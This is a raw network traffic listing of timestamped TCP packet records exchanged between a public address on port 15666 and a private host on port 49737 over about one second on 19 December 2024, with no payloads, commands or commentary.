Dec 19, 2024 08:52:46.882091999 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.882150888 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.882215977 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.882239103 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.882302999 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.882334948 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.882364988 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.882405996 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.882499933 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.882513046 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.882565975 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.882586002 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.882596970 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.882616043 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.882658005 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.882777929 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.882791042 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.882834911 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.882875919 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.882910013 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.882916927 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.882956982 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.883054972 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.883068085 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.883209944 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.883234978 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.883240938 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.883259058 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.883284092 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.883325100 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.883341074 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.883394957 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.883436918 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.883450031 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.883518934 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.883635998 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.883649111 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.883675098 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.883697033 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.883698940 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.883728027 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.883753061 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.883855104 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.883898973 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.883902073 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.883915901 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.883948088 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.883949041 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.883964062 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.883980989 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.884062052 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884074926 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884149075 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.884182930 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884196043 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884222031 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.884239912 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.884280920 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884294033 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884330034 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.884344101 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.884386063 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884398937 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884413004 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884435892 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884444952 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.884474039 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.884514093 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884536028 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884558916 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.884571075 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.884618998 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884632111 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884660006 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.884669065 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.884681940 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884722948 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.884746075 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884758949 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884834051 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.884865999 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884879112 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884891033 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884908915 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.884918928 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.884927988 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884931087 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.884939909 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884953022 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884964943 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.884996891 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.885011911 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.885049105 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.885063887 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.885093927 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.885104895 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.885106087 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.885133982 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.885154009 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.885171890 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.885185003 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.885232925 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.885245085 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.885257006 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.885278940 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.885301113 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.885334969 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.885346889 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.885442972 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.885456085 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.885492086 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.885524035 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.885536909 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.885588884 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.885607004 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.885629892 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.885680914 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.885708094 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.885723114 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.885746002 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.885767937 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.885791063 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.885876894 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.885889053 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.885889053 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.885920048 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.885950089 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.885996103 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886008024 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886022091 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886058092 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.886077881 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.886131048 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886143923 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886158943 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886173964 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886187077 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.886204958 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.886212111 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886224031 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886231899 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.886253119 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.886264086 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.886291981 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886303902 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886327028 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886348963 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886353970 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.886363029 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.886389017 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.886459112 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886471033 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886485100 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886502028 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886533022 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.886564016 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.886571884 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886584997 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886634111 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.886645079 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886658907 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886696100 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.886703968 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886713982 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.886794090 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886806965 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886842012 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.886864901 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886878014 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886904955 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.886907101 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886919975 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.886953115 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886975050 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.886975050 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.886996031 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.887022972 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.887063980 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.887077093 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.887105942 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.887106895 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.887114048 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.887123108 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.887166977 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.887202024 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.887244940 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.887245893 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.887267113 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.887279034 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.887332916 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.887335062 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.887376070 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.887398958 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.887403011 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.887419939 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.887419939 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.887449026 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.887455940 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.000422955 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.000437975 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.000487089 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.000521898 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.000560045 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.000567913 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.000600100 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.000608921 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.000622034 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.000658035 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.000751019 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.000799894 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.000828028 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.000854969 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.000880003 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.000910044 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.000932932 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.000946045 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.001039982 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.001051903 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.001079082 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.001091957 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.001105070 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.001137972 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.001144886 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.001184940 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.001188040 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.001198053 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.001230001 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.001240969 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.001276970 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.001317978 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.001323938 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.001359940 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.001463890 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.001477003 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.001507044 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.001521111 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.001549006 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.001550913 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.001590967 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.001674891 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.001713991 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.001765966 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.001811028 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.001934052 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.001983881 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.002041101 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.002053976 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.002075911 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.002098083 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.002114058 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.002214909 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.002228022 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.002260923 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.002280951 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.002357960 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.002371073 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.002403975 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.002417088 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.002513885 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.002526045 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.002549887 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.002567053 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.002595901 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.002604008 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.002667904 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.002685070 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.002728939 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.002747059 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.002804995 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.002825022 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.002868891 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.002880096 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.002918959 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.003041983 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.003092051 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.003181934 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.003195047 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.003222942 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.003236055 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.003257990 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.003269911 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.003302097 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.003304958 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.003349066 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.003432035 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.003444910 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.003479958 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.003546000 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.003568888 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.003595114 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.003613949 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.003635883 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.003679037 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.003705025 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.003729105 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.003824949 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.003869057 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.003889084 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.003964901 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.004005909 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.004050016 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.004065037 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.004108906 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.004168987 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.004226923 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.004291058 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.004293919 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.004304886 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.004340887 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.004405022 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.004416943 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.004453897 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.004513025 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.004549980 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.004574060 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.004636049 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.004683971 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.004697084 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.004729033 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.004749060 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.004790068 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.004834890 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.004853964 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.004904032 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.004947901 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.004992962 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.005016088 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.005028963 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.005043983 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.005059958 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.005069971 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.005084991 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.005192995 CET	15666	49737	193.3.19.151	192.168.2.4
